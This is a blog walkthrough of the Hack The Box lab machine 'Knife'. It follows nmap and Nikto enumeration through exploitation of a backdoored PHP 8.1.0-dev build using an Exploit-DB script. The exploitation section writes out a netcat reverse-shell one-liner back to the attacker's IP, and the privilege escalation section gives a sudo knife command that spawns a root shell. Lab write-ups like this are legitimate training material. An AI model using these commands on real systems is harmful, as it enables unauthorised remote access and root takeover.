Knife HacktheBox Walkthrough

at 3:49 AM Monday, September 27, 2021

Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s machine.

Level: Easy

Table of Content

Network Scanning

·         Nmap

Enumeration

·         Nikto

Exploitation

·         RCE (Python)

·         User.txt

Privilege Escalation

·         Sudo Rights

·         Root.txt

 

Kali: Attacker Machine

Victim’s Machine: HTB

 

Network Scanning

Run the Nmap to know the open ports and services.

Nmap –A 10.129.223.91

 As per the Nmap result, two ports are opened i.e. port 80 -HTTP and port 22 –SSH.



So now our only avenue of attack is through port 80 and port 22.

 

In the first look, we navigate port 80 in the web browser. But nothing informative we achieve here.

http://10.129.223.91


Enumeration

Without losing hope we move forward with the web scanner tool name as “Nikto” to get the vulnerability if any.Run the below command and output reveals the retrieved x-powered by the header as PHP/8.1.0-dev

Nikto –h 10.129.223.91


 

 

Let’s Google the PHP8.1 exploit.


 

Above we find that PHP version 8.1 is vulnerable and allow us to do remote code execution. If this version runs on a server, an attacker can execute arbitrary code by sending the User-Agent header.

On exploit db, we get the exploit EBD –ID 49933 download the script from the below link and save it.

URL: https://www.exploit-db.com/exploits/49933


 

Exploitation

 

Execute the downloaded script on the kali and enter the full host URL of the victim’s machine (HTB machine). Simultaneously, run the netcat listener on port 1234 the next terminal.

nc –lvp 2334

Python3 49933.py

http://10.129.223.91


In the above screenshot, we are getting the garbage issue in the shell. Let’s take a reliable shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.100 1234 >/tmp/f

Wow!! On the netcat terminal, we have a session, and now the journey of enumeration starts and gets the user.txt.

But our hunger is for root.txt.Let’s proceed to the root flag.

I notice something interesting with sudo rights.

Sudo –l


 

Privilege Escalation

As shown in the above screenshot, user James may run with /usr/bin/knife as a root because he has the sudo privileges with no password.

Let’s see what gtfobins said about the knife:

Knife: This is capable of running ruby code. If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

Refer: https://gtfobins.github.io/gtfobins/knife/#sudo

Below is the command to run

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'

cd /root

ls

cat root.txt

Finally, We capture the flag.

Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)